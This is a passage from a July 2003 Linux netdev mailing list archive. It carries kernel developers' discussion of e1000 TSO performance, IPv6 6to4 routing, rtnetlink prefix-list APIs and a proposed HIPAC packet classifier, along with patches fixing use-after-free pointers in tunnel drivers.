return err; } static void __exit eql_cleanup_module(void) { - kfree(dev_eql.priv); - unregister_netdev(&dev_eql); + unregister_netdev(dev_eql); + kfree(dev_eql); } module_init(eql_init_module); From davidm@napali.hpl.hp.com Tue Jul 15 16:02:07 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 16:02:14 -0700 (PDT) Received: from palrel10.hp.com (palrel10.hp.com [156.153.255.245]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FN26Fl015587 for ; Tue, 15 Jul 2003 16:02:07 -0700 Received: from hplms2.hpl.hp.com (hplms2.hpl.hp.com [15.0.152.33]) by palrel10.hp.com (Postfix) with ESMTP id B6CC71C021D1; Tue, 15 Jul 2003 16:02:05 -0700 (PDT) Received: from napali.hpl.hp.com (napali.hpl.hp.com [15.4.89.123]) by hplms2.hpl.hp.com (8.12.9/8.12.9/HPL-PA Hub) with ESMTP id h6FN24AR018477; Tue, 15 Jul 2003 16:02:05 -0700 (PDT) Received: from napali.hpl.hp.com (localhost [127.0.0.1]) by napali.hpl.hp.com (8.12.3/8.12.3/Debian-5) with ESMTP id h6FN24rK003174; Tue, 15 Jul 2003 16:02:04 -0700 Received: (from davidm@localhost) by napali.hpl.hp.com (8.12.3/8.12.3/Debian-5) id h6FN1tDZ003167; Tue, 15 Jul 2003 16:01:55 -0700 From: David Mosberger MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <16148.34787.633496.949441@napali.hpl.hp.com> Date: Tue, 15 Jul 2003 16:01:55 -0700 To: "David S. Miller" Cc: davidm@hpl.hp.com, scott.feldman@intel.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [patch] e1000 TSO parameter In-Reply-To: <20030714223822.23b78f9b.davem@redhat.com> References: <20030714214510.17e02a9f.davem@redhat.com> <16147.37268.946613.965075@napali.hpl.hp.com> <20030714223822.23b78f9b.davem@redhat.com> X-Mailer: VM 7.07 under Emacs 21.2.1 Reply-To: davidm@hpl.hp.com X-URL: http://www.hpl.hp.com/personal/David_Mosberger/ X-archive-position: 4070 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davidm@napali.hpl.hp.com Precedence: bulk X-list: netdev >>>>> On Mon, 14 Jul 2003 22:38:22 -0700, "David S. Miller" said: DaveM> But I don't think that's what is happening here, rather the DaveM> PCI controller is "talking" to the CPU's L2 cache with DaveM> coherency transactions on all the data of every packet going DaveM> to the chip. That's true. But shouldn't it be true for both the TSO and non-TSO case? DaveM> Whereas with a sendfile() type setup, the PCI controller is DaveM> going straight to main memory for the data part of the DaveM> packets since the CPU is unlikely to have each page cache DaveM> page in it's L2 caches. But sendfile() was _not_ used in any of the tests. The ftp server installed no the machine doesn't use it (not to my knowledge, at least) and netperf only uses it for the SENDFILE test. DaveM> I know how this can be fixed, can you use L2-bypassing stores DaveM> in your csum_and_copy_from_user() and copy_from_user() DaveM> implementations like we do on sparc64? That would exactly DaveM> eliminate this situation where the card is talking to the DaveM> cpu's L2 cache for all the data during the PCI DMA transation DaveM> on the send side. We could, but would it always be a win? Especially for copy_from_user(). Most of the time, that data remains cached, so I don't think we'd want to use non-temporal stores on those (in general). csum_and_copy_from_user() isn't well optimized yet. Let's see if I can find a volunteer... ;-) --david From kuznet@ms2.inr.ac.ru Tue Jul 15 16:11:27 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 16:11:32 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FNBPFl016097 for ; Tue, 15 Jul 2003 16:11:26 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id DAA09663; Wed, 16 Jul 2003 03:10:47 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307152310.DAA09663@dub.inr.ac.ru> Subject: Re: [PATCH] [1/2] kernel error reporting (revised) To: akpm@osdl.org (Andrew Morton) Date: Wed, 16 Jul 2003 03:10:47 +0400 (MSD) Cc: jkenisto@us.ibm.com, jmorris@intercode.com.au, davem@redhat.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, jgarzik@pobox.com, alan@lxorguk.ukuu.org.uk, rddunlap@osdl.org, kuznet@ms2.inr.ac.ru In-Reply-To: <20030715125121.315920a2.akpm@osdl.org> from "Andrew Morton" at éÀÌ 15, 2003 12:51:21 X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4071 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > netlink_broadcast() does read_lock(&nl_table_lock). But nl_table_lock is > not an irq-safe lock. Just as reminder, there are _no_ irq safe locks in net/*. A few of local_irq_disable()s are segregated in interface to device drivers. > Possibly netlink_broadcast() can be made callable from hardirq context, but > it looks to be non trivial. Trivial or non-trivial, before all this is highly not desired. net/* is better to remain in the form free of knowledge of hardirqs. Alexey From kuznet@ms2.inr.ac.ru Tue Jul 15 16:19:18 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 16:19:21 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FNJGFl016522 for ; Tue, 15 Jul 2003 16:19:17 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id DAA09683; Wed, 16 Jul 2003 03:19:00 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307152319.DAA09683@dub.inr.ac.ru> Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked To: pekkas@netcore.fi (Pekka Savola) Date: Wed, 16 Jul 2003 03:19:00 +0400 (MSD) Cc: davem@redhat.com, netdev@oss.sgi.com In-Reply-To: from "Pekka Savola" at éÀÌ 15, 2003 08:29:11 X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4072 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > Assume you're a host on a link with prefix 3FFE:FFFF:A:B::/64. The router > is the one with interface ID one. Not going to work. Host autoconfiguration conventions have nothing to do with real addressing. Proceeding in this way you will denounce neighbour discovery, what the hell to do this when hw address can be recovered from EUI64 token? :-) > What happens when you do "ping6 3FFE:FFFF:A:B::1" ? Hey, you have lost track, rewind several mails ago. Of course, ping and any other protocols will work, how can it not work? :-) Alexey From kuznet@ms2.inr.ac.ru Tue Jul 15 16:33:13 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 16:33:20 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FNXAFl017092 for ; Tue, 15 Jul 2003 16:33:11 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id DAA09710; Wed, 16 Jul 2003 03:32:03 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307152332.DAA09710@dub.inr.ac.ru> Subject: Re: Fw: [PATCH] IPv6: Allow 6to4 routes with SIT To: pekkas@netcore.fi (Pekka Savola) Date: Wed, 16 Jul 2003 03:32:03 +0400 (MSD) Cc: davem@redhat.com, jmorris@redhat.com, netdev@oss.sgi.com In-Reply-To: from "Pekka Savola" at éÀÌ 15, 2003 10:26:21 X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4073 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > Such addresses are link-locals, of link local scope only. A link-local > IPv6 address is awfully difficult to remember and type for all of your > possible links. > > The only reasonable value user could supply is a global address. So what? I do not see connection to previous. You want to live with global addresses as nexthop? OK. But I remember you have spoken something quite opposite yesterday. > Please describe what you mean by "real IPv6 6to4 addresses". ... > If the node processing those as a next-hop supports 6to4 and has the sit0 > pseudointerface configured, the address will be but through the special > handling. > > If the node doesn't support 6to4 or doesn't have the sit0 pseudointerface > configured, the address will be processed as normal, as any other IPv6 > nexthop. > > Right? I do not understand why did you ask previous question. You answered to this. > Redundant information can be ignored. This is not computer science > theory, removing everything which is not directly relevant. The use of > the same representation for the next-hop (2002:F00:BA::x) as an address > (2002:BA:F00:y) is the only logical, user-friendly way. What a bullshit... The second is address of host "x". The first is supposed to be address of host F00:BA, whatever it is. Probably, you can decrypt this only because poisoned by computer science. :-) Just to complete discussion, let's stay on format fe80::A.B.C.D, for example. Unlike anothers it is 100% logically clean. :-) Alexey From ja@ssi.bg Tue Jul 15 16:36:52 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 16:36:56 -0700 (PDT) Received: from u.domain.uli (ja.mac.ssi.bg [217.79.71.194]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FNamFl017447 for ; Tue, 15 Jul 2003 16:36:50 -0700 Received: from localhost (IDENT:ja@localhost [127.0.0.1]) by u.domain.uli (8.11.6/8.11.6) with ESMTP id h6FNf0v15059; Wed, 16 Jul 2003 02:41:00 +0300 Date: Wed, 16 Jul 2003 02:41:00 +0300 (EEST) From: Julian Anastasov X-X-Sender: ja@u.domain.uli To: "David S. Miller" cc: netdev@oss.sgi.com Subject: [patches] invalid nh.raw use after free Message-ID: MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="1607745702-670464987-1058312460=:14682" X-archive-position: 4074 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ja@ssi.bg Precedence: bulk X-list: netdev This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --1607745702-670464987-1058312460=:14682 Content-Type: TEXT/PLAIN; charset=US-ASCII Hello, The attached patches fix similar bug to many places (I'm not sure if there are more instances), where pointers remain to refer to freed skbs. For 2.5 and 2.4. Regards -- Julian Anastasov --1607745702-670464987-1058312460=:14682 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="ipip_old_iph-1.diff" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: ipip Content-Disposition: attachment; filename="ipip_old_iph-1.diff" LS0tIGxpbnV4L25ldC9pcHY0L2lwaXAuYy5vbGRfaXBoCVNhdCBKdWwgMTIg MTE6MDk6MjkgMjAwMw0KKysrIGxpbnV4L25ldC9pcHY0L2lwaXAuYwlXZWQg SnVsIDE2IDAyOjE4OjQxIDIwMDMNCkBAIC02MTYsNiArNjE2LDcgQEANCiAJ CQlza2Jfc2V0X293bmVyX3cobmV3X3NrYiwgc2tiLT5zayk7DQogCQlkZXZf a2ZyZWVfc2tiKHNrYik7DQogCQlza2IgPSBuZXdfc2tiOw0KKwkJb2xkX2lw aCA9IHNrYi0+bmguaXBoOw0KIAl9DQogDQogCXNrYi0+bmgucmF3ID0gc2ti X3B1c2goc2tiLCBzaXplb2Yoc3RydWN0IGlwaGRyKSk7DQo= --1607745702-670464987-1058312460=:14682 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="ip_gre_old_iph-1.diff" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: ip_gre Content-Disposition: attachment; filename="ip_gre_old_iph-1.diff" LS0tIGxpbnV4L25ldC9pcHY0L2lwX2dyZS5jLm9sZF9pcGgJU2F0IEp1bCAx MiAxMTowOToyOSAyMDAzDQorKysgbGludXgvbmV0L2lwdjQvaXBfZ3JlLmMJ V2VkIEp1bCAxNiAwMjoxMjo1NiAyMDAzDQpAQCAtODE2LDYgKzgxNiw3IEBA DQogCQkJc2tiX3NldF9vd25lcl93KG5ld19za2IsIHNrYi0+c2spOw0KIAkJ ZGV2X2tmcmVlX3NrYihza2IpOw0KIAkJc2tiID0gbmV3X3NrYjsNCisJCW9s ZF9pcGggPSBza2ItPm5oLmlwaDsNCiAJfQ0KIA0KIAlza2ItPm5oLnJhdyA9 IHNrYl9wdXNoKHNrYiwgZ3JlX2hsZW4pOw0K --1607745702-670464987-1058312460=:14682 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="sit_iph6-1.diff" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: sit Content-Disposition: attachment; filename="sit_iph6-1.diff" LS0tIGxpbnV4L25ldC9pcHY2L3NpdC5jLm9sZF9pcGg2CVNhdCBKdWwgMTIg MTE6MDk6MjkgMjAwMw0KKysrIGxpbnV4L25ldC9pcHY2L3NpdC5jCVdlZCBK dWwgMTYgMDI6MjM6MDYgMjAwMw0KQEAgLTU1MCw2ICs1NTAsNyBAQA0KIAkJ CXNrYl9zZXRfb3duZXJfdyhuZXdfc2tiLCBza2ItPnNrKTsNCiAJCWRldl9r ZnJlZV9za2Ioc2tiKTsNCiAJCXNrYiA9IG5ld19za2I7DQorCQlpcGg2ID0g c2tiLT5uaC5pcHY2aDsNCiAJfQ0KIA0KIAlza2ItPm5oLnJhdyA9IHNrYl9w dXNoKHNrYiwgc2l6ZW9mKHN0cnVjdCBpcGhkcikpOw0K --1607745702-670464987-1058312460=:14682-- From krkumar@us.ibm.com Tue Jul 15 17:12:58 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 17:13:13 -0700 (PDT) Received: from e4.ny.us.ibm.com (e4.ny.us.ibm.com [32.97.182.104]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G0CoFl018965 for ; Tue, 15 Jul 2003 17:12:57 -0700 Received: from northrelay02.pok.ibm.com (northrelay02.pok.ibm.com [9.56.224.150]) by e4.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6G0C2wO179010; Tue, 15 Jul 2003 20:12:02 -0400 Received: from us.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay02.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6G0BwcE128366; Tue, 15 Jul 2003 20:12:00 -0400 Message-ID: <3F149847.2000408@us.ibm.com> Date: Tue, 15 Jul 2003 17:11:51 -0700 From: Krishna Kumar Organization: IBM User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.2.1) Gecko/20021130 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Krishna Kumar CC: kuznet@ms2.inr.ac.ru, yoshfuji@linux-ipv6.org, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org Subject: Re: [PATCH 1/4] Prefix List against 2.5.73 References: <200307150117.FAA06705@dub.inr.ac.ru> <3F14492C.30708@us.ibm.com> In-Reply-To: <3F14492C.30708@us.ibm.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4075 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev > I proposechanging the values of IFA_PERM/TENT/DEPRE/SECOND, etc, On the other hand, to maintain compatibility with existing apps (ip command), I can change the new values instead. So now the same ip util program will display the correct flag values for the address and then display the remaining flags which are the O/M flags. I will send patch for this tomorrow. Thanks, - KK > Hi Alexey, > >>> + IFA_IFFLAGS, >> >> >> What's about ifa_flags? There is some space there, and the things >> kept there now: TENTATIVE/DEPRECATED et al. are close relatives >> of O/M. > > > > > Alexey, O/M are not flags for addresses, but for interfaces. > > > > > But tell me, please, what is the difference between new _address_ > > > > attribute IFA_IFFLAGS and already existing address attrbute > ifa_flags? > > Conceptually these are different, one for address and one for interface. > But I also > agree to your point that these can both be enclosed within one attribute > to return. > If we agree to do it in this way, then we have to change the values of > either of > the two sets of #defines (if_flags & ifa_flags since they intersect). I > propose > changing the values of IFA_PERM/TENT/DEPRE/SECOND, etc, for no other > reason other > than the MANAGED/OTHER flags has values copied off from the RA (bitwise > values of > the icmpv6_nd_ra field of RA). It might make more meaning to keep 0x80 > for field 'M' > which is the first bit of the field, but let me know if this is not > acceptable. > >> This does not pass through Occam's razor. Why not to give a filter to >> plain >> RTM_GETROUTE? We did not implement filtering not because we do not want, >> but because we (me, is more appropriate) are lazy. > > > OK, I can change that to give a filter. Is it OK to add the filter to > rtm_flags ? > I was thinking of adding RTM_F_PREFIX, and rt6_dump_route() can pass > this information > to rt6_fill_node() which does filtering of routes based on whether this > flag is set > or not. Did I understand you correctly here ? > >> Also, I am not sure that the interface should include things sort of >> >> + if ((addr_type & (IPV6_ADDR_LINKLOCAL | IPV6_ADDR_LOOPBACK | >> + IPV6_ADDR_MULTICAST)) != 0 || >> + addr_type == IPV6_ADDR_ANY) >> > > I can remove the check completely and introduce a new flag RTF_PREFIX_RT > to distinguish > between various route types. > > Are these modifications OK ? > > Thanks, > > - KK > >> For kernel all they are direct routes, if the application wants to apply >> some policy not formulated in terms of filters for RTM_GETROUTE, let it >> to filter itself. Moreover, I used to emphasize that user of rtnetlink >> should not believe to reliability of kernel filtering. It is just >> necessary >> measure to guarantee that a new application, which is aware of a new >> attribute, will behave correctly with older kernels, which are not aware >> of this attribute. Not a requirement, of course. >> >> Anyway, if you want to apply such specific policy, you can add a flag >> to rtm_flags, which would say: RTM_F_OFFICIALLY_PREFIX and base filtering >> on this flag, when it is given. >> >> Alexey >> > From kuznet@ms2.inr.ac.ru Tue Jul 15 17:21:51 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 17:21:59 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G0LnFl019474 for ; Tue, 15 Jul 2003 17:21:50 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id EAA10195; Wed, 16 Jul 2003 04:21:34 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307160021.EAA10195@dub.inr.ac.ru> Subject: Re: [PATCH 1/4] Prefix List against 2.5.73 To: krkumar@us.ibm.com (Krishna Kumar) Date: Wed, 16 Jul 2003 04:21:33 +0400 (MSD) Cc: yoshfuji@linux-ipv6.org, davem@redhat.com, netdev@oss.sgi.com, linux-net@vger.kernel.org In-Reply-To: <3F14492C.30708@us.ibm.com> from "Krishna Kumar" at éÀÌ 15, 2003 11:34:20 X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4076 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > the two sets of #defines (if_flags & ifa_flags since they intersect). I propose > changing the values of IFA_PERM/TENT/DEPRE/SECOND, This is almost impossible, it is an old public API. > which is the first bit of the field, but let me know if this is not acceptable. Select yourself: either IFA_IFFLAGS or translated flags in ifa_flags. I prefer the second way just because it is too unpleasant to add a new attribute for sake of two bits with no visible candidates to use remaining ones. > OK, I can change that to give a filter. Is it OK to add the filter to rtm_flags ? > I was thinking of adding RTM_F_PREFIX, and rt6_dump_route() can pass this information > to rt6_fill_node() which does filtering of routes based on whether this flag is set > or not. Did I understand you correctly here ? Perfectly! > I can remove the check completely and introduce a new flag RTF_PREFIX_RT to distinguish > between various route types. > > Are these modifications OK ? Yes, I would prefer this... Actually, it is mostly to leave possibility to override this bit administratively. :-) If you insist this is totally illegal and the rule must be hardwired, new flag is really redundant. Alexey From scott.feldman@intel.com Tue Jul 15 17:28:05 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 17:28:15 -0700 (PDT) Received: from hermes.jf.intel.com (fmr05.intel.com [134.134.136.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G0S2Fl019889 for ; Tue, 15 Jul 2003 17:28:05 -0700 Received: from talaria.jf.intel.com (talaria.jf.intel.com [10.7.209.7]) by hermes.jf.intel.com (8.11.6p2/8.11.6/d: outer.mc,v 1.66 2003/05/22 21:17:36 rfjohns1 Exp $) with ESMTP id h6G0PqR11020 for ; Wed, 16 Jul 2003 00:25:52 GMT Received: from orsmsxvs041.jf.intel.com (orsmsxvs041.jf.intel.com [192.168.65.54]) by talaria.jf.intel.com (8.11.6p2/8.11.6/d: inner.mc,v 1.35 2003/05/22 21:18:01 rfjohns1 Exp $) with SMTP id h6FNr8A01565 for ; Tue, 15 Jul 2003 23:53:09 GMT Received: from orsmsx331.amr.corp.intel.com ([192.168.65.56]) by orsmsxvs041.jf.intel.com (NAVGW 2.5.2.11) with SMTP id M2003071517275604755 ; Tue, 15 Jul 2003 17:27:56 -0700 Received: from orsmsx402.amr.corp.intel.com ([192.168.65.208]) by orsmsx331.amr.corp.intel.com with Microsoft SMTPSVC(5.0.2195.5329); Tue, 15 Jul 2003 17:27:56 -0700 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-MimeOLE: Produced By Microsoft Exchange V6.0.6375.0 Subject: RE: [patch] e1000 TSO parameter Date: Tue, 15 Jul 2003 17:27:56 -0700 Message-ID: X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: [patch] e1000 TSO parameter Thread-Index: AcNKkXfnLmDm+gDET0axp1OGYzd6LwAnoLlw From: "Feldman, Scott" To: Cc: , X-OriginalArrivalTime: 16 Jul 2003 00:27:56.0650 (UTC) FILETIME=[1A7EBCA0:01C34B31] Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id h6G0S2Fl019889 X-archive-position: 4077 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: scott.feldman@intel.com Precedence: bulk X-list: netdev > TSO disabled: > > $ modprobe InterruptThrottleRate=0,0,0,0 TSO=0,0,0,0 If you're trying to remove all interrupt moderation, you'll also want to add these: RxIntDelay=0,0,0,0 RxAbsIntDelay=0,0,0,0 TxIntDelay=0,0,0,0 TxAbsIntDelay=0,0,0,0 See the app note here for more info: http://www.intel.com/design/network/applnots/8254x_ap450.htm -scott From davidm@napali.hpl.hp.com Tue Jul 15 17:41:41 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 17:41:52 -0700 (PDT) Received: from palrel10.hp.com (palrel10.hp.com [156.153.255.245]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G0feFl020474 for ; Tue, 15 Jul 2003 17:41:40 -0700 Received: from hplms2.hpl.hp.com (hplms2.hpl.hp.com [15.0.152.33]) by palrel10.hp.com (Postfix) with ESMTP id 3E7BA1C01964; Tue, 15 Jul 2003 17:41:40 -0700 (PDT) Received: from napali.hpl.hp.com (napali.hpl.hp.com [15.4.89.123]) by hplms2.hpl.hp.com (8.12.9/8.12.9/HPL-PA Hub) with ESMTP id h6G0fdAR025744; Tue, 15 Jul 2003 17:41:39 -0700 (PDT) Received: from napali.hpl.hp.com (localhost [127.0.0.1]) by napali.hpl.hp.com (8.12.3/8.12.3/Debian-5) with ESMTP id h6G0fdrK004164; Tue, 15 Jul 2003 17:41:39 -0700 Received: (from davidm@localhost) by napali.hpl.hp.com (8.12.3/8.12.3/Debian-5) id h6G0fdLh004160; Tue, 15 Jul 2003 17:41:39 -0700 From: David Mosberger MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <16148.40771.167565.322759@napali.hpl.hp.com> Date: Tue, 15 Jul 2003 17:41:39 -0700 To: "Feldman, Scott" Cc: , , Subject: RE: [patch] e1000 TSO parameter In-Reply-To: References: X-Mailer: VM 7.07 under Emacs 21.2.1 Reply-To: davidm@hpl.hp.com X-URL: http://www.hpl.hp.com/personal/David_Mosberger/ X-archive-position: 4078 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davidm@napali.hpl.hp.com Precedence: bulk X-list: netdev >>>>> On Tue, 15 Jul 2003 17:27:56 -0700, "Feldman, Scott" said: >> TSO disabled: >> $ modprobe InterruptThrottleRate=0,0,0,0 TSO=0,0,0,0 Scott> If you're trying to remove all interrupt moderation, you'll Scott> also want to add these: Scott> RxIntDelay=0,0,0,0 RxAbsIntDelay=0,0,0,0 TxIntDelay=0,0,0,0 Scott> TxAbsIntDelay=0,0,0,0 Scott> See the app note here for more info: Scott> http://www.intel.com/design/network/applnots/8254x_ap450.htm I wasn't aware of that note. Thanks for the pointer! --david From hadi@cyberus.ca Tue Jul 15 18:02:40 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 18:02:47 -0700 (PDT) Received: from mail.cyberus.ca (mail.cyberus.ca [209.195.118.111]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G12dFl021730 for ; Tue, 15 Jul 2003 18:02:40 -0700 Received: from cpe0030ab124d2f-cm014500000962.cpe.net.cable.rogers.com ([24.103.99.32] helo=[10.0.0.9]) by mail.cyberus.ca with esmtp (Exim 4.12) id 19cagj-000CZi-00; Tue, 15 Jul 2003 21:02:33 -0400 Subject: Re: [RFC] High Performance Packet Classifiction for tc framework From: jamal Reply-To: hadi@cyberus.ca To: nf@hipac.org Cc: linux-net@vger.kernel.org, netdev@oss.sgi.com In-Reply-To: <200307141045.40999.nf@hipac.org> References: <200307141045.40999.nf@hipac.org> Content-Type: text/plain Organization: jamalopolis Message-Id: <1058328537.1797.24.camel@jzny.localdomain> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.2.2 Date: 16 Jul 2003 01:02:02 -0400 Content-Transfer-Encoding: 7bit X-archive-position: 4079 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: hadi@cyberus.ca Precedence: bulk X-list: netdev Hi Michael, I noticed you guys like to post to the kernel list at times without even ccing netdev based on my browsing just now. Please send msgs to netdev first; ccing lk is optional.Infact i took it out of the cc. On Mon, 2003-07-14 at 04:45, Michael Bellion and Thomas Heinz wrote: > Hi > > We are planning to port our HIPAC algorithm to the tc framework and we > ask you for some comments about several issues. > This is good.I may have emailed you about this topic before? [..] > > Certainly, we'd like to know first whether HIPAC makes sense for the > tc framework at all. It's a classifier therefore it makes sense ;-> > From the nf-hipac worst case performance tests > we know that our algorithm should be faster in all cases as soon as > you have approx. 20 filters. Below 20 filters there is no difference > between nf-hipac and the iptables filter table. nice. What would be interesting is to see your rule update rates vs iptables (i expect iptables to suck) - but how do you compare aginst any of the tc classifiers for example? > So basically the question is: Are people using the tc framework with > lots of filters? Some numbers would be helpful. > I am not sure anybody could give you numbers; i have seen a posting once which talked about 1K rules. I hardly use more than 10 in my setup however there amy be people who will be looking (even if it is for benchmarking purposes) in the 100K range. Short answer - go for the max you can. > Since we can only improve performance of u32 and fw filters it's also > interesting whether such rulesets typically consist of those filters > in the main. > Actually theres a _lot_ of room for improvement for u32. I have played with a few tricks which will greatly up the numbers for high number of rules. > The tc framework is very flexible with respect to where filters can be > attached. Unfortunately this cannot be mapped into one HIPAC data > structure. Our current design allows to attach filters anywhere but > only the filters attached to the top level qdisc would benefit from the > HIPAC algorithm. Would this be a noticeable restriction? > I dont think so, but can ytou describe this restriction? > > Here is a short overview of the main design goals: > > - new qdisc for HIPAC which is basically a container for the filters; > it can only be attached as top level qdisc why? > - new HIPAC classifier which supports all native nf-hipac matches > (src/dst ip, proto, src/dst port, ttl, state, in_iface, icmp type, > tcpflags, fragments) and additionally fwmark I would think for cleanliness fwmark or any metadata related classification would be separate from one that is based on packet bits. > - the HIPAC classifier can only be attached to the HIPAC qdisc and vice > versa the HIPAC qdisc only accepts HIPAC classifiers We do have an issue with being able to do extended classification but building a qdisc for it is a no no. Building a qdisc that will force other classifier to structure themselves after it is even a bigger sin. Look at the action code i have (i can send you an updated patch); a better idea is to make extended classifiers an action based on another filter match. At least this is what i have been toying with and i dont think it is clean enough. what we need is to extend the filtering framework itself to have extended classifiers. > - the HIPAC qdisc consists of only one single class to which the "next" > qdisc must be attached > - the HIPAC classifier can contain a number of existing classifiers > (u32, fw, route, rsvp, tcindex) whereby the semantics is as follows: > a HIPAC classifier matches if the native matches and also each of the > embedded classifiers match; the returned tcf_result is the one from > the final classifier (=> intermediate classifiers are reduced to a > match) > - it is still possible to attach non-hipac classifiers to other qdiscs > and classes > Please junk this idea. Study the classification framework code and come up with something that is based on that. Second best option is to take a look at the action code. We dont want to force other classifiers in research to be constrained to your structures. This is not trying to put down work you are doing - i think you have something good. cheers, jamal From hadi@cyberus.ca Tue Jul 15 18:03:06 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 18:03:10 -0700 (PDT) Received: from mail.cyberus.ca (mail.cyberus.ca [209.195.118.111]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6G135Fl021813 for ; Tue, 15 Jul 2003 18:03:06 -0700 Received: from cpe0030ab124d2f-cm014500000962.cpe.net.cable.rogers.com ([24.103.99.32] helo=[10.0.0.9]) by mail.cyberus.ca with esmtp (Exim 4.12) id 19cahF-000Ccb-00; Tue, 15 Jul 